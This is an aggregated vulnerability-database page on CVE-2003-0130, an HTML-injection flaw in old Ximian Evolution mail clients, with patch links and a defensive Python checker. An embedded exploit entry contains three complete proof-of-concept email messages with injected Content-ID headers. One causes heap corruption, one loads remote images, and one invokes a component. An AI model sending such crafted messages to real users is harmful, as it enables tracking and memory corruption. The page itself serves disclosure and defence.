CVE-2003-0130
CVSS 5.0
Published: 2003-03-24 00:00:00
Last revised: 2016-10-17 22:29:54

[Original] The handle_image function in mail-format.c for Ximian Evolution Mail User Agent 1.2.2 and earlier does not properly escape HTML characters, which allows remote attackers to inject arbitrary data and HTML via a MIME Content-ID header in a MIME-encoded image.


[CNNVD] Ximian Evolution MIME image/* Content-Type Data Inclusion Vulnerability (CNNVD-200303-072)

        
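        Ximian Evolution is a personal and workgroup information management solution for Linux and Unix operating systems that integrates email, calendar, meeting scheduling, and contact management.
        Ximian Evolution does not properly validate MIME image/* Content-Type fields; a remote attacker can exploit this vulnerability to bypass some security policies or to have external content types handled.
        If an email message contains an image/* Content-Type field, arbitrary data can be embedded in the image information, which can lead to arbitrary HTML tags being embedded and processed by GTKHtml, or to bonobo components being invoked to handle external content types.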
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:ximian:evolution:1.2
cpe:/a:ximian:evolution:1.0.8
cpe:/a:ximian:evolution:1.0.4
cpe:/a:ximian:evolution:1.2.2
cpe:/a:ximian:evolution:1.0.7
cpe:/a:ximian:evolution:1.0.5
cpe:/a:ximian:evolution:1.0.3
cpe:/a:ximian:evolution:1.2.1
cpe:/a:ximian:evolution:1.0.6
cpe:/a:ximian:evolution:1.1.1

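- OVAL (technical details for detection)

oval:org.mitre.oval:def:111 Ximian Evolution MIME-encoded Image Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.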

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0130
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0130
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-072
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0141.html
(UNKNOWN)  BUGTRAQ  20030319 CORE-2003-03-04-01: Multiple vulnerabilities in Ximian's Evolution Mail User Agent
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000648
(UNKNOWN)  CONECTIVA  CLA-2003:648
http://marc.info/?l=bugtraq&m=104826470527308&w=2
(UNKNOWN)  BUGTRAQ  20030321 GLSA: evolution (200303-18)
http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
(VENDOR_ADVISORY)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
http://www.gentoo.org/security/en/glsa/glsa-200303-18.xml
(UNKNOWN)  GENTOO  GLSA-200303-18
http://www.mandriva.com/security/advisories?name=MDKSA-2003:045
(UNKNOWN)  MANDRAKE  MDKSA-2003:045
http://www.redhat.com/support/errata/RHSA-2003-108.html
(UNKNOWN)  REDHAT  RHSA-2003:108
http://www.securityfocus.com/bid/7119
(VENDOR_ADVISORY)  BID  7119

- Vulnerability information

Ximian Evolution MIME image/* Content-Type Data Inclusion Vulnerability
Medium severity  Input validation
2003-03-24 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        RedHat
        ------
        RedHat has released a security advisory (RHSA-2003:108-01) and corresponding patches for this issue:
        RHSA-2003:108-01:Updated Evolution packages fix multiple vulnerabilities
        Link: https://www.redhat.com/support/errata/RHSA-2003-108.html
        Patch downloads:
        Red Hat Upgrade evolution-1.0.8-11.i386.rpm
        ftp://updates.redhat.com/8.0/en/os/i386/evolution-1.0.8-11.i386.rpm
        Red Hat Linux 8.0
        Red Hat Upgrade evolution-1.0.8-9.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/evolution-1.0.8-9.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/gal-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-devel-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/gal-devel-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade libgal19-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/libgal19-0.19.2-3.7x.i386.rpm
        Ximian
        ------
        The vendor has released an upgrade that fixes this security issue; download version 1.2.3 from the vendor's home page:
        
        http://www.ximian.com/products/ximian_evolution/

- Vulnerability information (22371)

Ximian Evolution 1.x MIME image/* Content-Type Data Inclusion Vulnerability (EDBID:22371)
linux remote
2003-03-19 Verified
0 Core Security
N/A
source: http://www.securityfocus.com/bid/7119/info

Ximian Evolution does not properly validate MIME image/* Content-Type fields. If an email message contains an image/* Content-Type, any type of data can be embedded where the image information is expected. This can be used to embed HTML tags that will be rendered by GTKHtml, bypass policies, or invoke bonobo components to handle external content types.

The following example will cause heap corruption:

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Content-Id: hello

Hello World!

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name1.gif
Content-Type: image/gif; name=name1.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

The following example will bypass the "Don't connect to remote hosts to fetch images" option:

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: apart

<img src="http://external.host.com:anyport">

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

The following example will cause Evolution to invoke the bonobo-audio-ulaw component:

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: audio/ulaw
Content-Transfer-Encoding: 7bit
Content-Id: mysong

There she was, just walking down the street...

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y		
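
A defensive check for the pattern in the sample messages above, added here as an example (not code from Evolution, Core Security or the advisories): it flags every MIME part, image/* or otherwise, whose Content-ID carries HTML metacharacters, and shows the value HTML-escaped before it is placed in markup. The sample message, the function names and the `<img src="cid:...">` markup shape are assumptions constructed for illustration.

```python
import email
import html
from email import policy

HTML_META = set("<>\"'&")  # characters that can break out of an HTML attribute

# Constructed sample (not from the advisory): a bare id, a well-formed msg-id,
# and an id shaped like the injected values in the messages above.
SAMPLE = (
    b'Content-Type: multipart/mixed; boundary="b1"\r\n'
    b'Mime-Version: 1.0\r\n\r\n'
    b'--b1\r\nContent-Type: text/plain\r\nContent-Id: hello\r\n\r\nHello World!\r\n'
    b'--b1\r\nContent-Type: image/gif; name=ok.gif\r\n'
    b'Content-Id: <img1@example.invalid>\r\n\r\n\r\n'
    b'--b1\r\nContent-Type: image/gif; name=bad.gif\r\n'
    b'Content-Id: "><b>injected</b><hr "\r\n\r\n\r\n'
    b'--b1--\r\n'
)

def strip_brackets(cid):
    """Drop surrounding whitespace and one outer <...> pair (msg-id form)."""
    cid = cid.strip()
    if len(cid) >= 2 and cid[0] == "<" and cid[-1] == ">":
        cid = cid[1:-1]
    return cid

def suspicious_content_ids(raw):
    """Return (content_type, content_id) for parts whose id has HTML metacharacters."""
    msg = email.message_from_bytes(raw, policy=policy.compat32)
    hits = []
    for part in msg.walk():
        cid = part.get("Content-ID")  # header lookup is case-insensitive
        if cid is None:
            continue
        cid = str(cid).strip()
        if HTML_META & set(strip_brackets(cid)):
            hits.append((part.get_content_type(), cid))
    return hits

def safe_img_tag(cid):
    """Build the assumed <img src="cid:..."> markup with the id HTML-escaped."""
    return '<img src="cid:%s">' % html.escape(strip_brackets(cid), quote=True)

if __name__ == "__main__":
    for ctype, cid in suspicious_content_ids(SAMPLE):
        print("suspicious Content-ID in %s part: %r" % (ctype, cid))
        print("escaped for rendering:", safe_img_tag(cid))
```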

- Vulnerability information

13491
Ximian Evolution Mail User Agent handle_image Function Arbitrary Data Injection
Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- Vulnerability description

- Timeline

2003-03-19 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.2.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Ximian Evolution MIME image/* Content-Type Data Inclusion Vulnerability
Input Validation Error 7119
Yes No
2003-03-19 12:00:00 2009-07-11 09:06:00
Discovered by Diego Kelyacoubian, Javier Kohen, Alberto Solino, and Juan Vera of Core Security Technologies.

- Affected program versions

Ximian Evolution 1.2.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ RedHat Linux 9.0 i386
Ximian Evolution 1.2.1
Ximian Evolution 1.2
Ximian Evolution 1.1.1
Ximian Evolution 1.0.8
+ Mandriva Linux Mandrake 9.0
Ximian Evolution 1.0.7
Ximian Evolution 1.0.6
Ximian Evolution 1.0.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Ximian Evolution 1.0.4
Ximian Evolution 1.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ RedHat Linux 7.3
Ximian Evolution 1.2.3

- Unaffected program versions

Ximian Evolution 1.2.3

- Vulnerability discussion

Ximian Evolution does not properly validate MIME image/* Content-Type fields. If an email message contains an image/* Content-Type, any type of data can be embedded where the image information is expected. This can be used to embed HTML tags that will be rendered by GTKHtml, bypass policies, or invoke bonobo components to handle external content types.

- Solution

Red Hat has released a security advisory (RHSA-2003:108-01) which contains fixes for this issue. Users are advised to upgrade as soon as possible.

The appropriate fixes have been applied to the Evolution CVS tree.

Ximian has reported that Evolution 1.2.3 will be released; however, it does not appear to be available at this time. Users are advised to monitor the Ximian Evolution release page for further information.

Conectiva Linux has released an advisory. Affected users are advised to upgrade to new versions of Evolution. Further information about obtaining and applying fixes is available in the referenced advisory.


Ximian Evolution 1.0.3

Ximian Evolution 1.0.8

Ximian Evolution 1.2.2
